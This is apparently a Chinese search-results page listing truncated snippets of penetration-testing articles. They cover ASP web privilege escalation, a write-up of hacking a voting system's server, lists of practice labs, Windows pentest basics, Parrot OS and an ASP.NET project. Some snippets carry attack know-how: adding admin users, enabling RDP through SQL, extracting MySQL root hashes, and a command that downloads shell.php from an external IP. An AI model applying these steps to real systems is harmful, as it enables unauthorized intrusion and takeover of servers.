首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

渗透测试之ASP Web提权

有时候可以添加用户,但是添加不到管理组,有可能是administrators改名了,net user administrator 看下本地组成员,*administrators 17.进入服务器,可以继续内网渗透...开启3389的SQL语句: syue.com/xiaohua.asp?...在mysql的安装目录下找到user.myd这个文件,root就藏在里面,一般是40位cmd加密,一些php网站安装的时候用的是root用户,在conn.asp config.asp这些文件里。...注意:5.0版本以下(包括5.0的)默认c:\windows\系统目录就可以了,5.1版本以上的不能导出到系统目录下创建自定义函数,只能导出在mysql安装目录下的lib/plugin目录中 例如:D:...6.x 破解数据库密码工具使用 百度搜索:hzhosts华众虚拟主机系统6.x 破解数据库密码工具 N点虚拟主机 N点虚拟主机管理系统默认数据库地址为:\host_date\#host # date#

3.7K40
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    渗透网络投票系统解析投票骗局

    自从上次研究投票后身边一大堆找刷票的,也尝试了几种系统,感觉大部分都有漏洞或是bug(对于写代码的来说bug和漏洞还是区分的很敏感,勿笑)。...在这个服务器上找到的程序可以断定和投票系统是一模一样的,代码写的有点烂说实话,密码是 md5(密码+字符串)加密的,难怪看了数据库解密md5总是解不出来。...整个投票系统都看了,也没心思详细审计代码,至少在层面上来说是找不到什么漏洞了,反正大体结构都了解了。...不用看了稳妥妥的,直接访问ip跳转到了网站,确定了这就是投票系统的服务器IP,直接试试刚才爬到的支付页面的mysql配置。 ?...很久没碰了都生疏了,上次发了解析投票系统漏洞,很多人都在骂,第一次发确实感到失望。第二次分享,纯属无聊,也希望平平淡淡的生活能有一点快乐 。

    2.5K80

    web渗透测试靶站开源系统

    分享几个web渗透测试常用网站(靶场) DVWA (Dam Vulnerable Web Application) DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序...其中包含了丰富的渗透测试项目,如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等....链接地址 Google XSS 游戏 Google推出的XSS小游戏 链接地址 Web for Pentester web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的...Metasploit 出品方 rapid7 还提供了配置好的环境 Metasploitable,是一个打包好的操作系统虚拟机镜像,使用 VMWare 的格式。...本文链接:https://www.xy586.top/1100.html 转载请注明文章来源:行云博客 » web渗透测试靶站开源系统

    1K20

    windows系统安全|Windows渗透基础大全

    Windows渗透基础大全 目录 Windows发展历史 Windows中常见的目录 Windows常见的cmd命令 Windows中cmd窗口的文件下载(bitsadmin、certutil、iwr...,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。...114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下 但是该命令的使用会引发杀毒软件的查杀,所以在实际渗透中几乎不适用该命令...一些常见的系统进程和含义: conime.exe:与输入法编辑器有关的系统进程,能够确保正常调整和编辑系统中的输入法 csrss.exe:该进程是微软客户端/服务端运行时子系统,该进行管理windows...、本地安全和登录策略 services.exe:该进程用于启动和停止系统中的服务,如果用户手动终止该进程,系统也会重新启动该进程 smss.exe:该进程用于调用对话管理子系统,负责用户与操作系统的对话

    1.8K10

    渗透测试系统学习-Day2

    公开课 第三节课:Web服务器通信原理 1.常见的服务器系统 服务器:其实是一台电脑,正常情况下,服务器是24小时运行的,性能强悍,存储量很高,且有独立的公网IP 运行的服务:网站,文件传输 系统:操作系统...服务器系统:针对于服务器的操作系统,内置了很多服务器才用的工具和软件 例如: Windows server (服务器定制版)=> Windows系统 Linux => 安卓系统(基于Linux) Mac...系统 => 苹果电脑,苹果手机 服务器追求性价比 Linux优势:对硬件性能要求低 512MB的运行内存就可以运行的就很流畅,Linux很多版本,开源,可高度定制化 Linux劣势:大部分Linux只有命令行...,没有界面,对新手很不友好 Windows优势:界面和正常的Windows系统相同,图形界面化 Windows劣势:对硬件性能要求很高,很容易卡 大公司一般情况下都是用Linux,小公司Windows偏多...远程桌面服务 3306端口:数据库端口 端口查看: netstat -a -n 从访客角度查看网页浏览流程 1.用户在浏览器输入 协议://域名 例如:www.shirong.ink 2.用户浏览器通过系统

    36520

    炫酷的渗透系统Parrot Security OS

    Parrot Security OS是一款基于Debian渗透测试系统,集成了诸多流行渗透测试工具,并以其漂亮的UI而出名。...网址:http://www.parrotsec.org/ 在download菜单下,我选择了I386,因为我不知道我的X64的CPU选那个最好,AMD64是应用于64位的系统的,但是不知道inter的CPU...由于parrot这个系统是基于debian的,所以如果大家使用的低版本的VM虚拟机,记得选择debian,由于我使用的是VM11,所以不需要这么选择。最后20G空间足以。 ?...然后就是一个系统桌面了,这里就可以使用这个系统了,不过目前还没有安装在硬盘上,所以做配置更改应该是不能保存的。 ? metasploit也可以打开,不过我就是感受下,我退出去了,开始正式的硬盘安装。...然后你就完成了这个炫酷的系统安装! ? *作者:MonkeyKing,转载请注明来自Freebuf黑客与极客(FreeBuf.COM)

    2K60

    项目小结:日立OA系统Asp.net)

    客户端浏览器发送域名到DNS,DNS根据域名找到IP再发送回客户端浏览器; 2.浏览器根据IP向Web服务器发出请求(是Get方式,所以只有请求头),开始踏上不归路; 3.服务器接收到请求进行一连串处理(详细请参考:asp.net...管道模型(管线模型)之一发不可收拾和Asp.net页面生命周期) 4.服务器返回响应(响应头、响应体)给浏览器; 5.浏览器边接收响应边将HTML代码解释构建成Dom树,遇到css、js等解释性语言就进行解释...1.首先将css文件引用放在head标签中,js文件引用放在页面代码的末尾;   2.分别合并css文件引用和js文件引用的请求(具体方法请参考:网页优化系列一:合并文件请求(asp.net版));  ...客户基本满意,那这部分就算是交差了,(*^__^*) 嘻嘻…… 2.一键关闭web系统所有页面,不断尝试,却被奇怪的方法Kill了             需求:在OA系统首页有一个“关闭系统”按钮可以关闭该系统的所有页面...2.关闭系统时会先出现空白页面然后它又自动关闭。如果要关闭的窗口多那也挺突兀的。

    3.1K50
    领券